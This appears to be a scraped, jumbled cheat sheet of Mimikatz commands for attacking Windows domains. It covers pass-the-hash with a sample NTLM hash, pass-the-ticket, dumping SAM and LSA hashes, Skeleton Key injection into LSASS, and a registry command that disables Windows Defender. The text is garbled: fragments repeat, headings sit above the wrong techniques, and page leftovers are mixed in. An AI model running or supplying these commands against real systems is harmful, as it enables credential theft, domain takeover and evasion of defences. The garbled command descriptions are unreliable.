Sheet: Mimikatz Cheat

sekurlsa::pth /user:Administrator /domain:target.local /ntlm:ab5116125432651aa4213164a251261a /run:cmd.exe Use code with caution. Pass-the-Ticket (PtT)

Use NTLM hash to authenticate without the plaintext password:

Different modules target different storage areas within Windows. lsadump::sam Dumps local user NTLM hashes from the SAM database. lsadump::lsa /patch mimikatz cheat sheet

: sekurlsa::pth /user:[User] /domain:[Domain] /ntlm:[NTLM_Hash] /run:powershell.exe Pass-the-Ticket (PtT) : kerberos::ptt [path_to_ticket.kirbi] List Kerberos Tickets : kerberos::list Domain Persistence (Golden/Silver Tickets)

| Command | Purpose | |---------|---------| | misc::skeleton | Inject Skeleton Key into LSASS (set to mimikatz ) – very noisy | | misc::mem | Dump LSASS process memory to disk | | misc::log | Start logging console output to file | | misc::stoplog | Stop logging | | misc::clip | Read/clear clipboard contents | | misc::net | Network statistics | sekurlsa::pth /user:Administrator /domain:target

PtH works on Windows, but newer Windows versions with Credential Guard mitigate it.

To dump all users:

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

Dumps full NTLM hash, even for protected users. even for protected users.

Scroll to Top